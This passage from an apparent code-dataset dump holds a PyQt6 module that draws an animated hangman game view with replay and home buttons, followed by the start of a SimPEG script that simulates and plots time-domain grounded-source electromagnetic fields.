QPainter, QColor, QPen, QPolygon, QFont\nfrom PyQt6.QtMultimedia import QSoundEffect\n\nfrom Display.Button import 
Button\nfrom Display.ScoreView import ScoreView\nfrom Score import Score\n\nSOUND_FILE = \"sound/knife.wav\"\n\n\nclass TestWindow(QtWidgets.QMainWindow):\n\n def __init__(self, parent=None):\n super(TestWindow, self).__init__(parent)\n self.form_widget = HangmanView(progress=1, debug_anim=True)\n self.setCentralWidget(self.form_widget)\n self.setLayout(QtWidgets.QHBoxLayout())\n self.form_widget.showReplayButton(5)\n self.show()\n\n\nclass HangmanView(QtWidgets.QWidget):\n \"\"\"\n Hangman Drawing View that is responsible for drawing hangman animation with its progress animation.\n\n \"\"\"\n\n def __init__(self,\n max_attempts: int = 5,\n progress: float = 0,\n assets_dir: str = \"../assets\",\n reply_handler=lambda: print(\"Replay!!\"),\n home_handler=lambda: print(\"Home!!\"),\n debug_anim: bool = False):\n super(HangmanView, self).__init__()\n\n uic.loadUi(assets_dir + '/ui/hangmanView.ui', self)\n self.assets_dir: str = assets_dir\n \"\"\" Path to asset directory\"\"\"\n\n self.thicknessRatio: float = 0.05\n \"\"\" Thickness ration for the pen to the width\"\"\"\n self.thickness: int = 1\n \"\"\" Thickness of pen\"\"\"\n self.progress_percentage: float = progress\n \"\"\" Progress of the hangman drawing\"\"\"\n self.max_attempts: int = max_attempts\n \"\"\" Max attempts of the hangman\"\"\"\n self.attempts: int = self.max_attempts\n \"\"\" Remaining attempts\"\"\"\n self.debug_anim: bool = debug_anim\n \"\"\" Debug flag\"\"\"\n self.reply_handler = reply_handler\n \"\"\" Reply callback function for the reply button click\"\"\"\n self.home_handler = home_handler\n \"\"\" Home callback function for the home button click\"\"\"\n self.score_feed: list[Score] = []\n \"\"\" List of the score feed show in the left of the hangman view\"\"\"\n\n self.drawings = [\n self.drawBase,\n self.drawPoll,\n self.drawSupport,\n self.drawTop,\n self.drawHanger,\n self.drawHead,\n self.drawBody,\n self.drawLeftArm,\n self.drawRightArm,\n self.drawLeftLeg,\n self.drawRightLeg\n ]\n self.damageAnimValue: float = 0\n \"\"\" Animation progress integer used to keep track of the progress of the damage animation\"\"\"\n self.damageTimer: QTimer = QTimer()\n \"\"\" Damage animation timer used to create the damage animation\"\"\"\n self.overlay: float = 1\n \"\"\" Animation progress integer used to keep track of the progress of the overlay animation\"\"\"\n self.overlayTimer: QTimer = QTimer()\n \"\"\" Overlay animation timer used to create the overlay animation\"\"\"\n\n self.effect: QSoundEffect = None\n \"\"\" Sound effect played for the wrong guesses\"\"\"\n self.home_button: Button = None\n \"\"\" Home button \"\"\"\n self.reply_button: Button = None\n \"\"\" Reply button \"\"\"\n\n self.scoreView: ScoreView = None\n \"\"\" Score view that contains the feed of scores\"\"\"\n\n self.damageTimer.timeout.connect(lambda: self.damageAnim())\n self.overlayTimer.timeout.connect(lambda: self.overlayAnim())\n\n def setScoreView(self, scoreView: ScoreView) -> None:\n \"\"\"\n Setter for the Score View\n\n Parameters:\n scoreView (ScoreView): New scoreView\n\n Returns:\n None\n\n \"\"\"\n self.scoreView = scoreView\n\n def showReplayButton(self, duration: int = 5) -> None:\n \"\"\"\n Show reply button\n\n Parameters:\n duration (int): Duration of animation\n\n Returns:\n None\n\n \"\"\"\n self.overlayTimer.start(duration)\n\n def hideReplayButton(self) -> None:\n \"\"\"\n Hide reply button\n\n Returns:\n None\n\n \"\"\"\n self.overlayTimer.stop()\n self.setOverlay(1)\n\n def startDamageAnimation(self, duration: int = 
5) -> None:\n \"\"\"\n Start damage animation\n\n Parameters:\n duration (int): Duration of animation\n\n Returns:\n None\n\n \"\"\"\n self.damageAnimValue = 1\n self.damageTimer.start(duration)\n\n def takeDamage(self) -> None:\n \"\"\"\n Take damage by progressing the hangman stage with sound and animation feedback\n\n Returns:\n None\n\n \"\"\"\n filename = self.assets_dir + \"/\" + SOUND_FILE\n self.effect = QSoundEffect()\n self.effect.setSource(QUrl.fromLocalFile(filename))\n self.effect.play()\n\n self.startDamageAnimation(5)\n\n if self.attempts <= 0:\n print(\"Hangman animation cannot got beyond\")\n return\n self.attempts = self.attempts - 1\n if self.attempts == 0:\n self.setStageProgress(1)\n else:\n self.setStageProgress((self.max_attempts - self.attempts) / self.max_attempts)\n\n def setReplayHandler(self, handler, append: bool = True) -> None:\n \"\"\"\n Update replay button handler\n\n Parameters:\n handler (callable): New handler\n append (bool): True if appending the new handler to the existing handler\n\n Returns:\n None\n\n \"\"\"\n func = self.reply_handler\n if self.reply_handler is not None and append:\n self.reply_handler = lambda: [func(), handler()]\n else:\n self.reply_handler = lambda: handler()\n\n def setHomeHandler(self, handler, append: bool = True) -> None:\n \"\"\"\n Update home button handler\n\n Parameters:\n handler (callable): New handler\n append (bool): True if appending the new handler to the existing handler\n\n Returns:\n None\n\n \"\"\"\n func = self.home_handler\n if self.home_handler is not None and append:\n self.home_handler = lambda: [func(), handler()]\n else:\n self.home_handler = lambda: handler()\n\n def setStageProgress(self, progress_percentage: float) -> None:\n \"\"\"\n set progress_percentage to the new value\n\n Parameters:\n progress_percentage (int): New progress_percentage value\n\n Returns:\n None\n\n \"\"\"\n self.progress_percentage = progress_percentage\n\n def setMaxAttempts(self, max_attempts: int) -> None:\n \"\"\"\n Setter for the max_attempts\n\n Parameters:\n max_attempts (str): New max_attempts\n\n Returns:\n None\n\n \"\"\"\n self.max_attempts = max_attempts\n self.attempts = max_attempts\n\n def reset(self) -> None:\n \"\"\"\n Resets the hangman view\n\n Returns:\n None\n\n \"\"\"\n self.attempts = self.max_attempts\n self.setOverlay(0)\n self.damageAnimValue = 0\n self.setStageProgress(0)\n self.repaint()\n self.damageTimer.stop()\n self.overlayTimer.stop()\n # self.showReplayButton(5)\n\n def setOverlay(self, overlay: float) -> None:\n \"\"\"\n Setter for the overlay\n\n Parameters:\n overlay (float): New overlay value\n\n Returns:\n None\n\n \"\"\"\n if 0 < overlay < 1:\n self.overlay = overlay\n elif overlay < 0:\n self.overlay = 0\n else:\n self.overlay = 1\n\n self.home_button.setOpacity(int(255 * ((1 - self.overlay) * 2)))\n self.reply_button.setOpacity(int(255 * ((1 - self.overlay) * 2)))\n\n def overlayAnim(self) -> None:\n \"\"\"\n Overlay animation callback\n\n Returns:\n None\n\n \"\"\"\n if self.overlay < 0.5:\n self.overlayTimer.stop()\n else:\n self.setOverlay(self.overlay - 0.01)\n self.repaint()\n\n def damageAnim(self) -> None:\n \"\"\"\n Overlay animation callback\n\n Returns:\n None\n\n \"\"\"\n if self.damageAnimValue <= 0:\n self.damageAnimValue = 1\n self.damageAnimValue -= 0.05\n if self.damageAnimValue < 0:\n self.damageTimer.stop()\n else:\n self.repaint()\n\n def resizeEvent(self, a0: QtGui.QResizeEvent) -> None:\n regionRect: QRectF = self.getHangmanRect()\n rect = regionRect.toRect()\n 
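# Rebuild both overlay buttons on every resize so they stay anchored to the\n        # hangman drawing area; setOverlay below restores their current opacity.\n        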
self.home_button = Button(rect.left(), rect.top() + int(0.7 * rect.height()), rect.width(), rect.height(), 0.8,\n 0.2,\n bg_color=QColor(66, 205, 82))\n\n self.reply_button = Button(rect.left(), rect.top() + int(0.3 * rect.height()), rect.width(), rect.height(), 0.8,\n 0.2,\n bg_color=QColor(66, 205, 82))\n self.setOverlay(self.overlay)\n\n def mouseReleaseEvent(self, event: QtGui.QMouseEvent) -> None:\n if self.debug_anim:\n self.takeDamage()\n self.attempts = self.max_attempts\n self.progress_percentage = 1\n\n # Reply\n self.reply_button.eventHandle(event, self.reply_handler)\n\n # Home button\n self.home_button.eventHandle(event, self.home_handler)\n\n def paintEvent(self, e) -> None:\n qp = QtGui.QPainter()\n qp.begin(self)\n qp.setRenderHint(QPainter.RenderHint.Antialiasing)\n regionRect: QRectF = self.getHangmanRect()\n\n if self.scoreView is not None:\n self.drawScoreFeed(qp, regionRect)\n self.thickness = int(self.thicknessRatio * regionRect.width())\n\n qp.setBrush(QColor(29, 27, 24))\n # qp.setBrush(QColor(int(29 * self.value), int(27 * self.value), int(24 * self.value)))\n pen = QPen()\n pen.setStyle(Qt.PenStyle.NoPen)\n qp.setPen(pen)\n\n rect = regionRect.toRect()\n qp.drawRect(rect)\n\n for i in range(len(self.drawings)):\n if self.progress_percentage <= i / len(self.drawings):\n break\n if i == (len(self.drawings) - 1) and self.progress_percentage != 1:\n break\n\n color = QColor(\n int((100 + int((255 - 100) * self.damageAnimValue)) * self.overlay),\n int((100 + int((255 - 100) * self.damageAnimValue)) * self.overlay),\n int((100 + int((255 - 100) * self.damageAnimValue)) * self.overlay)\n ) if i < 5 else QColor(\n int(255 * self.overlay),\n int((255 - int(255 * self.damageAnimValue)) * self.overlay),\n int((255 - int(255 * self.damageAnimValue)) * self.overlay))\n\n self.drawings[i](qp, color, rect.left(), rect.top(), rect.width(), rect.height())\n # self.overlay = 0.5\n\n if self.reply_button.isActive():\n self.drawReplayButton(qp, self.reply_button)\n if self.home_button.isActive():\n self.drawHomeButton(qp, self.home_button)\n\n qp.end()\n\n def getHangmanRect(self) -> QRectF:\n \"\"\"\n Getter for the hangman box rectangle.\n\n Returns:\n QRectF: Area of the hangman drawing will take\n\n \"\"\"\n width = self.width()\n height = self.height()\n width_ratio = 2\n height_ratio = 3\n width32 = None\n height32 = None\n top = None\n left = None\n if width * height_ratio / width_ratio < height:\n width32 = width\n height32 = width * height_ratio / width_ratio\n top = (height - height32) / 2\n left = 0\n\n else:\n height32 = height\n width32 = height32 * width_ratio / height_ratio\n top = 0\n left = (width - width32) / 2\n\n rect = QRectF(left, top, width32, height32)\n return rect\n\n def getScoreFeedRect(self, hangmanRect: QRectF) -> QRectF:\n \"\"\"\n Getter for the hangman box rectangle.\n\n Parameters:\n hangmanRect (QRectF): Area of hangman box rectangle.\n\n Returns:\n QRectF: Area of the score feed rectangle will take\n\n \"\"\"\n width: int = self.width()\n leftSpacingWidth = int((width - hangmanRect.width()) / 2)\n\n return QRectF(self.width() // 2 + int(hangmanRect.width() / 2), 0, leftSpacingWidth, self.height())\n\n def drawScoreFeed(self, painter: QPainter, hangmanRect: QRectF) -> None:\n \"\"\"\n Draw Score feed\n\n Parameters:\n painter (QPainter): Painter of the paintEvent\n hangmanRect (QRectF): Area of hangman box rectangle.\n\n Returns:\n None\n\n \"\"\"\n painter.setBrush(QColor(255, 27, 24))\n socreFeedRect = self.getScoreFeedRect(hangmanRect)\n\n 
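# Render the recent scores as buttons stacked from the top of the feed area,\n        # dimming older entries by lowering opacity with their feed position.\n        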
score_feed = self.scoreView.getFeed()\n for i in range(0, len(score_feed)):\n score = score_feed[i]\n button = Button(socreFeedRect.left(),\n socreFeedRect.top() + (i + 1) * socreFeedRect.height() * 0.12,\n socreFeedRect.width(),\n socreFeedRect.height(), 0.5, 0.1,\n text=str(score), fg_color=QColor(255, 255, 255, 255),\n bg_color=score.getBGColor(255),\n border_color=score.getPen(255).color()\n )\n button.setOpacity(int(255 * (5 - i) / 5))\n button.drawButton(painter)\n\n def drawHomeButton(self, painter: QPainter, button: Button) -> None:\n \"\"\"\n Draw home button\n\n Parameters:\n painter (QPainter): Painter of the paintEvent\n hangmanRect (QRectF): Area of hangman box rectangle.\n\n Returns:\n None\n\n \"\"\"\n\n center = button.rect.center()\n\n length = button.getLength()\n button.drawButton(painter)\n\n color_icon = QColor(255, 255, 255, int(255 * ((1 - self.overlay) * 2)))\n pen = QPen(color_icon)\n\n pen.setCapStyle(Qt.PenCapStyle.RoundCap)\n painter.setPen(pen)\n\n size_icon: QPointF = QPointF(length, length) / 24 * 9\n\n pen = QPen()\n pen.setStyle(Qt.PenStyle.NoPen)\n painter.setPen(pen)\n painter.setBrush(color_icon)\n size_triangle = size_icon\n triangle = QPolygon([\n QPointF(center.x() - size_triangle.x(), center.y() + size_triangle.y() * 1 / 2).toPoint(),\n QPointF(center.x(), center.y() - size_triangle.y() * 1 / 3).toPoint(),\n QPointF(center.x() + size_triangle.x(), center.y() + size_triangle.y() * 1 / 2).toPoint()]\n ).translated(0, - (size_icon.toPoint() / 3 * 2).y())\n painter.drawPolygon(triangle, Qt.FillRule.WindingFill)\n\n rect = QRect(\n (center - size_icon / 2).toPoint(),\n (center + size_icon / 2).toPoint()\n ).translated(0, (size_icon / 4).toPoint().y())\n painter.drawRect(rect)\n\n def drawReplayButton(self, painter: QPainter, button: Button) -> None:\n \"\"\"\n Draw replay button\n\n Parameters:\n painter (QPainter): Painter of the paintEvent\n hangmanRect (QRectF): Area of hangman box rectangle.\n\n Returns:\n None\n\n \"\"\"\n pen = QPen()\n pen.setStyle(Qt.PenStyle.NoPen)\n # painter.setPen(pen)\n\n center = button.rect.center()\n\n length = button.getLength()\n button.drawButton(painter)\n\n color_icon = QColor(255, 255, 255, int(255 * ((1 - self.overlay) * 2)))\n startAngle = 0 * 16\n spanAngle = -270 * 16\n pen = QPen(color_icon)\n pen.setWidth(int(button.getHeight() / 10))\n pen.setCapStyle(Qt.PenCapStyle.RoundCap)\n painter.setPen(pen)\n\n size_arc = QPointF(length, length) / 7 * 2\n arc_rect = QRect(\n (center - size_arc).toPoint(),\n (center + size_arc).toPoint()\n )\n painter.drawArc(arc_rect, startAngle, spanAngle)\n\n pen = QPen()\n pen.setStyle(Qt.PenStyle.NoPen)\n painter.setPen(pen)\n painter.setBrush(color_icon)\n size_triangle = size_arc\n triangle = QPolygon([\n QPointF(center.x() - size_triangle.x() * 1 / 3, center.y() - size_triangle.y() / 2).toPoint(),\n QPointF(center.x() + size_triangle.x() * 2 / 3, center.y()).toPoint(),\n QPointF(center.x() - size_triangle.x() * 1 / 3, center.y() + size_triangle.y() / 2).toPoint()]\n ).translated(0, - size_arc.toPoint().y())\n painter.drawPolygon(triangle, Qt.FillRule.WindingFill)\n\n def drawBase(self, painter: QPainter, color: QColor, left: int, top: int, width: int, height: int) -> None:\n \"\"\"\n Draw base of hangman\n\n Parameters:\n painter (QPainter): Painter of the paintEvent\n color (QColor): Color of the drawing\n left (int): left corner of the drawing box\n top (int): top corner of the drawing box\n width (int):width of the available space\n height (int): height of the available 
space\n\n Returns:\n None\n\n \"\"\"\n painter.setBrush(color)\n positionBottomBar = (\n left,\n top + height - self.thickness,\n width,\n self.thickness\n )\n\n painter.drawRect(\n positionBottomBar[0],\n positionBottomBar[1],\n positionBottomBar[2],\n positionBottomBar[3])\n\n def drawPoll(self, painter: QPainter, color: QColor, left: int, top: int, width: int, height: int) -> None:\n \"\"\"\n Draw poll of hangman\n\n Parameters:\n painter (QPainter): Painter of the paintEvent\n color (QColor): Color of the drawing\n left (int): left corner of the drawing box\n top (int): top corner of the drawing box\n width (int):width of the available space\n height (int): height of the available space\n\n Returns:\n None\n\n \"\"\"\n painter.setBrush(color)\n positionPoll = (\n left + int(width * 0.2),\n top + int(height * 0.1),\n self.thickness,\n int(height * 0.9)\n )\n painter.drawRect(\n positionPoll[0],\n positionPoll[1],\n positionPoll[2],\n positionPoll[3])\n\n def drawTop(self, painter: QPainter, color: QColor, left: int, top: int, width: int, height: int) -> None:\n \"\"\"\n Draw top bar of hangman\n\n Parameters:\n painter (QPainter): Painter of the paintEvent\n color (QColor): Color of the drawing\n left (int): left corner of the drawing box\n top (int): top corner of the drawing box\n width (int):width of the available space\n height (int): height of the available space\n\n Returns:\n None\n\n \"\"\"\n painter.setBrush(color)\n positionTopBar = (\n left + int(width * 0.1),\n top + int(height * 0.2),\n int(width * 0.8),\n self.thickness\n )\n painter.drawRect(\n positionTopBar[0],\n positionTopBar[1],\n positionTopBar[2],\n positionTopBar[3])\n\n def drawSupport(self, painter: QPainter, color: QColor, left: int, top: int, width: int, height: int) -> None:\n \"\"\"\n Draw support bar of hangman\n\n Parameters:\n painter (QPainter): Painter of the paintEvent\n color (QColor): Color of the drawing\n left (int): left corner of the drawing box\n top (int): top corner of the drawing box\n width (int):width of the available space\n height (int): height of the available space\n\n Returns:\n None\n\n \"\"\"\n painter.setBrush(color)\n painter.drawPolygon(\n QtGui.QPolygon([\n QPoint(left + int(width * 0.4), top + int(height * 0.2)),\n QPoint(left + int(width * 0.4) + self.thickness, top + int(height * 0.2)),\n QPoint(left + int(width * 0.2), top + int(height * 0.4) + self.thickness),\n QPoint(left + int(width * 0.2), top + int(height * 0.4))\n ]))\n\n def drawHanger(self, painter: QPainter, color: QColor, left: int, top: int, width: int, height: int) -> None:\n \"\"\"\n Draw hanger of hangman\n\n Parameters:\n painter (QPainter): Painter of the paintEvent\n color (QColor): Color of the drawing\n left (int): left corner of the drawing box\n top (int): top corner of the drawing box\n width (int):width of the available space\n height (int): height of the available space\n\n Returns:\n None\n\n \"\"\"\n pen = QPen(color)\n pen.setWidth(self.thickness // 2)\n painter.setPen(pen)\n\n start = QPoint(left + int(width * 0.6) + self.thickness, top + int(height * 0.2))\n end = QPoint(left + int(width * 0.6) + self.thickness, top + int(height * 0.35))\n painter.drawLine(start, end)\n\n def drawHead(self, painter: QPainter, color: QColor, left: int, top: int, width: int, height: int) -> None:\n \"\"\"\n Draw head of hangman\n\n Parameters:\n painter (QPainter): Painter of the paintEvent\n color (QColor): Color of the drawing\n left (int): left corner of the drawing box\n top (int): top corner of the drawing 
box\n width (int):width of the available space\n height (int): height of the available space\n\n Returns:\n None\n\n \"\"\"\n pen = QPen(color)\n painter.setPen(self.initPen(pen))\n painter.setBrush(color)\n\n radius = int(self.thickness * 1.5)\n center = QPoint(left + int(width * 0.6) + self.thickness, top + int(height * 0.35))\n\n painter.drawEllipse(center, radius, radius)\n\n def drawBody(self, painter: QPainter, color: QColor, left: int, top: int, width: int, height: int) -> None:\n \"\"\"\n Draw body of hangman\n\n Parameters:\n painter (QPainter): Painter of the paintEvent\n color (QColor): Color of the drawing\n left (int): left corner of the drawing box\n top (int): top corner of the drawing box\n width (int):width of the available space\n height (int): height of the available space\n\n Returns:\n None\n\n \"\"\"\n pen = QPen(color)\n painter.setPen(self.initPen(pen))\n\n start = QPoint(left + int(width * 0.6) + self.thickness, top + int(height * 0.35))\n end = QPoint(left + int(width * 0.6) + self.thickness, top + int(height * 0.6))\n painter.drawLine(start, end)\n\n def drawLeftArm(self, painter: QPainter, color: QColor, left: int, top: int, width: int, height: int) -> None:\n \"\"\"\n Draw left arm of hangman\n\n Parameters:\n painter (QPainter): Painter of the paintEvent\n color (QColor): Color of the drawing\n left (int): left corner of the drawing box\n top (int): top corner of the drawing box\n width (int):width of the available space\n height (int): height of the available space\n\n Returns:\n None\n\n \"\"\"\n pen = QPen(color)\n painter.setPen(self.initPen(pen))\n\n start = QPoint(left + int(width * 0.6) + self.thickness, top + int(height * 0.4))\n end = QPoint(left + int(width * 0.5) + self.thickness, top + int(height * 0.5))\n painter.drawLine(start, end)\n\n def drawRightArm(self, painter: QPainter, color: QColor, left: int, top: int, width: int, height: int) -> None:\n \"\"\"\n Draw right arm of hangman\n\n Parameters:\n painter (QPainter): Painter of the paintEvent\n color (QColor): Color of the drawing\n left (int): left corner of the drawing box\n top (int): top corner of the drawing box\n width (int):width of the available space\n height (int): height of the available space\n\n Returns:\n None\n\n \"\"\"\n pen = QPen(color)\n painter.setPen(self.initPen(pen))\n\n start = QPoint(left + int(width * 0.6) + self.thickness, top + int(height * 0.4))\n end = QPoint(left + int(width * 0.7) + self.thickness, top + int(height * 0.5))\n painter.drawLine(start, end)\n\n def drawLeftLeg(self, painter: QPainter, color: QColor, left: int, top: int, width: int, height: int) -> None:\n \"\"\"\n Draw left leg of hangman\n\n Parameters:\n painter (QPainter): Painter of the paintEvent\n color (QColor): Color of the drawing\n left (int): left corner of the drawing box\n top (int): top corner of the drawing box\n width (int):width of the available space\n height (int): height of the available space\n\n Returns:\n None\n\n \"\"\"\n pen = QPen(color)\n painter.setPen(self.initPen(pen))\n\n start = QPoint(left + int(width * 0.6) + self.thickness, top + int(height * 0.6))\n end = QPoint(left + int(width * 0.5) + self.thickness, top + int(height * 0.7))\n painter.drawLine(start, end)\n\n def drawRightLeg(self, painter: QPainter, color: QColor, left: int, top: int, width: int, height: int) -> None:\n \"\"\"\n Draw right leg of hangman\n\n Parameters:\n painter (QPainter): Painter of the paintEvent\n color (QColor): Color of the drawing\n left (int): left corner of the drawing box\n top 
(int): top corner of the drawing box\n width (int):width of the available space\n height (int): height of the available space\n\n Returns:\n None\n\n \"\"\"\n pen = QPen(color)\n painter.setPen(self.initPen(pen))\n\n start = QPoint(left + int(width * 0.6) + self.thickness, top + int(height * 0.6))\n end = QPoint(left + int(width * 0.7) + self.thickness, top + int(height * 0.7))\n painter.drawLine(start, end)\n\n def initPen(self, pen: QPen) -> QPen:\n \"\"\"\n Show character at an index\n\n Parameters:\n index (int): Index of character in a word that you want to show\n\n Returns:\n None\n\n \"\"\"\n pen.setWidth(self.thickness // 2)\n pen.setCapStyle(Qt.PenCapStyle.RoundCap)\n return pen\n\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n widget = TestWindow()\n app.exec()\n","repo_name":"cis3296f22/prj-04-hangmanai","sub_path":"Display/HangmanView.py","file_name":"HangmanView.py","file_ext":"py","file_size_in_byte":27271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"10020771532","text":"import numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport deepdish as dd\nfrom discretize import TensorMesh\nfrom SimPEG import utils\nimport tarfile\nimport os\n\nfrom mpl_toolkits.mplot3d import axes3d\nfrom matplotlib import cm\nfrom mpl_toolkits.mplot3d.art3d import Poly3DCollection\nfrom matplotlib.patches import FancyArrowPatch\nfrom mpl_toolkits.mplot3d import proj3d\n\n\ndef download_and_unzip_data(\n url=\"https://storage.googleapis.com/simpeg/em_examples/tdem_groundedsource/tdem_groundedsource.tar\",\n):\n \"\"\"\n Download the data from the storage bucket, unzip the tar file, return\n the directory where the data are\n \"\"\"\n # download the data\n downloads = utils.download(url)\n\n # directory where the downloaded files are\n directory = downloads.split(\".\")[0]\n\n # unzip the tarfile\n tar = tarfile.open(downloads, \"r\")\n tar.extractall()\n tar.close()\n\n return downloads, directory\n\n\nuse_computed_results = True\n\n\ndef load_or_run_results(\n re_run=False, fname=None, sigma_block=0.01, sigma_halfspace=0.01\n):\n if re_run:\n run_simulation(\n fname=fname, sigma_block=sigma_block, sigma_halfspace=sigma_halfspace\n )\n else:\n downloads, directory = download_and_unzip_data()\n fname = os.path.sep.join([directory, fname])\n\n simulation_results = dd.io.load(fname)\n mesh = TensorMesh(\n simulation_results[\"mesh\"][\"h\"], x0=simulation_results[\"mesh\"][\"x0\"]\n )\n sigma = simulation_results[\"sigma\"]\n times = simulation_results[\"time\"]\n input_currents = simulation_results[\"input_currents\"]\n E = simulation_results[\"E\"]\n B = simulation_results[\"B\"]\n J = simulation_results[\"J\"]\n output = {\n \"mesh\": mesh,\n \"sigma\": sigma,\n \"times\": times,\n \"input_currents\": input_currents,\n \"E\": E,\n \"B\": B,\n \"J\": J,\n }\n return output\n\n\ndef choose_model(model):\n known_names = [\"tdem_gs_half.h5\", \"tdem_gs_conductor.h5\", \"tdem_gs_resistor.h5\"]\n if model == \"halfspace\":\n ind = 0\n elif model == \"conductor\":\n ind = 1\n elif model == \"resistor\":\n ind = 2\n return known_names[ind]\n\n\ndef run_simulation(fname=\"tdem_gs_half.h5\", sigma_block=0.01, sigma_halfspace=0.01):\n from SimPEG.electromagnetics import time_domain as tdem\n from SimPEG.electromagnetics.utils import waveform_utils\n from scipy.constants import mu_0\n import numpy as np\n from SimPEG import maps, utils\n from pymatsolver import Pardiso\n\n cs = 20\n ncx, ncy, ncz = 20, 
20, 20\n npad = 10\n hx = [(cs, npad, -1.5), (cs, ncx), (cs, npad, 1.5)]\n hy = [(cs, npad, -1.5), (cs, ncy), (cs, npad, 1.5)]\n hz = [(cs, npad, -1.5), (cs, ncz), (cs, npad, 1.5)]\n mesh = TensorMesh([hx, hy, hz], \"CCC\")\n sigma = np.ones(mesh.nC) * sigma_halfspace\n blk_ind = utils.ModelBuilder.getIndicesBlock(\n np.r_[-40, -40, -160], np.r_[40, 40, -80], mesh.gridCC\n )\n sigma[mesh.gridCC[:, 2] > 0.0] = 1e-8\n sigma[blk_ind] = sigma_block\n\n xmin, xmax = -200.0, 200.0\n ymin, ymax = -200.0, 200.0\n x = mesh.cell_centers_x[np.logical_and(mesh.cell_centers_x > xmin, mesh.cell_centers_x < xmax)]\n y = mesh.cell_centers_y[np.logical_and(mesh.cell_centers_y > ymin, mesh.cell_centers_y < ymax)]\n xyz = utils.ndgrid(x, y, np.r_[-1.0])\n\n px = np.r_[-200.0, 200.0]\n py = np.r_[0.0, 0.0]\n pz = np.r_[0.0, 0.0]\n srcLoc = np.c_[px, py, pz]\n\n from scipy.interpolate import interp1d\n\n t0 = 0.01 + 1e-4\n times = np.logspace(-4, -2, 21)\n rx_ex = tdem.receivers.PointElectricField(xyz, times + t0, orientation=\"x\")\n rx_ey = tdem.receivers.PointElectricField(xyz, times + t0, orientation=\"y\")\n rx_by = tdem.receivers.PointElectricField(xyz, times + t0, orientation=\"y\")\n\n rxList = [rx_ex, rx_ey, rx_by]\n\n sim = tdem.Simulation3DMagneticFluxDensity(mesh, sigma=sigma, verbose=True)\n sim.Solver = Pardiso\n sim.solverOpts = {\"is_symmetric\": False}\n sim.time_steps = [(1e-3, 10), (2e-5, 10), (1e-4, 10), (5e-4, 10), (1e-3, 10)]\n t0 = 0.01 + 1e-4\n out = waveform_utils.VTEMFun(sim.times, 0.01, t0, 200)\n wavefun = interp1d(sim.times, out)\n waveform = tdem.sources.RawWaveform(offTime=t0, waveFct=wavefun)\n\n src = tdem.sources.LineCurrent(rxList, location=srcLoc, waveform=waveform)\n survey = tdem.survey.Survey([src])\n sim.survey = survey\n input_currents = wavefun(sim.times)\n\n f = sim.fields(sigma)\n\n xyzlim = np.array([[xmin, xmax], [ymin, ymax], [-400, 0.0]])\n actinds, meshCore = utils.extract_core_mesh(xyzlim, mesh)\n Pex = mesh.getInterpolationMat(meshCore.gridCC, locType=\"Ex\")\n Pey = mesh.getInterpolationMat(meshCore.gridCC, locType=\"Ey\")\n Pez = mesh.getInterpolationMat(meshCore.gridCC, locType=\"Ez\")\n Pfx = mesh.getInterpolationMat(meshCore.gridCC, locType=\"Fx\")\n Pfy = mesh.getInterpolationMat(meshCore.gridCC, locType=\"Fy\")\n Pfz = mesh.getInterpolationMat(meshCore.gridCC, locType=\"Fz\")\n\n sigma_core = sigma[actinds]\n\n def getEBJcore(src0):\n B0 = np.r_[Pfx * f[src0, \"b\"], Pfy * f[src0, \"b\"], Pfz * f[src0, \"b\"]]\n E0 = np.r_[Pex * f[src0, \"e\"], Pey * f[src0, \"e\"], Pez * f[src0, \"e\"]]\n J0 = utils.sdiag(np.r_[sigma_core, sigma_core, sigma_core]) * E0\n return E0, B0, J0\n\n E, B, J = getEBJcore(src)\n tdem_gs = {\n \"E\": E,\n \"B\": B,\n \"J\": J,\n \"sigma\": sigma_core,\n \"mesh\": meshCore.serialize(),\n \"time\": sim.times - t0,\n \"input_currents\": input_currents,\n }\n dd.io.save(fname, tdem_gs)\n\n\n# ------------------------------------------------------------------- #\n# For visualizations\n# ------------------------------------------------------------------- #\n\n\nclass PlotTDEM(object):\n \"\"\"docstring for PlotTDEM\"\"\"\n\n mesh = None\n sigma = None\n times = None\n input_currents = None\n E = None\n B = None\n J = None\n\n def __init__(self, **kwargs):\n super(PlotTDEM, self).__init__()\n utils.setKwargs(self, **kwargs)\n self.xmin, self.xmax = self.mesh.cell_centers_x.min(), self.mesh.cell_centers_x.max()\n self.ymin, self.ymax = self.mesh.cell_centers_y.min(), self.mesh.cell_centers_y.max()\n self.zmin, self.zmax = 
self.mesh.cell_centers_z.min(), self.mesh.cell_centers_z.max()\n\n def show_3d_survey_geometry(self, elev, azim, show_block=False):\n X1, X2 = -250.0, 250.0\n Y1, Y2 = -250.0, 250.0\n Z1, Z2 = -400.0, 0.0\n\n def polyplane(verts, alpha=0.1, color=\"green\"):\n poly = Poly3DCollection(verts)\n poly.set_alpha(alpha)\n poly.set_facecolor(color)\n return poly\n\n z1 = -100.0\n x = np.r_[X1, X2, X2, X1, X1]\n y = np.ones(5) * 0.0\n z = np.r_[Z1, Z1, Z2, Z2, Z1]\n verts = [list(zip(x, y, z))]\n polyplane(verts, color=\"green\")\n x = np.r_[X1, X2, X2, X1, X1]\n y = np.r_[Y1, Y1, Y2, Y2, Y1]\n z = np.ones(5) * 0.0\n verts = [list(zip(x, y, z))]\n polyplane(verts, color=\"grey\")\n x = np.r_[X1, X2, X2, X1, X1]\n y = np.r_[Y1, Y1, Y2, Y2, Y1]\n z = np.ones(5) * z1\n verts = [list(zip(x, y, z))]\n polyplane(verts, color=\"grey\")\n\n fig = plt.figure(figsize=(8, 8))\n ax = fig.add_subplot(projection='3d')\n ax.plot3D(np.r_[-200, 200], np.r_[0, 0], np.r_[1, 1] * 0.0, \"r-\", lw=3)\n ax.plot3D(\n self.mesh.gridCC[:, 0],\n self.mesh.gridCC[:, 1],\n np.zeros_like(self.mesh.gridCC[:, 0]),\n \"k.\",\n )\n ax.legend((\"Tx\", \"Rx\"), loc=1)\n\n if show_block:\n\n xc, yc, zc = 0, 0, 0\n x1, x2 = -40, 40\n y1, y2 = -40, 40\n z1, z2 = -160, -80\n x = np.r_[x1, x2, x2, x1, x1]\n y = np.ones(5) * 0.0\n z = np.r_[z1, z1, z2, z2, z1]\n ax.plot3D(x, y, z, \"k--\")\n x = np.r_[x1, x2, x2, x1, x1]\n y = np.r_[y1, y1, y2, y2, y1]\n z = np.ones(5) * (z1 + z2) / 2.0\n ax.plot3D(x, y, z, \"k--\")\n\n block_xyz = np.asarray(\n [\n [x1, x1, x2, x2, x1, x1, x2, x2],\n [y1, y2, y2, y1, 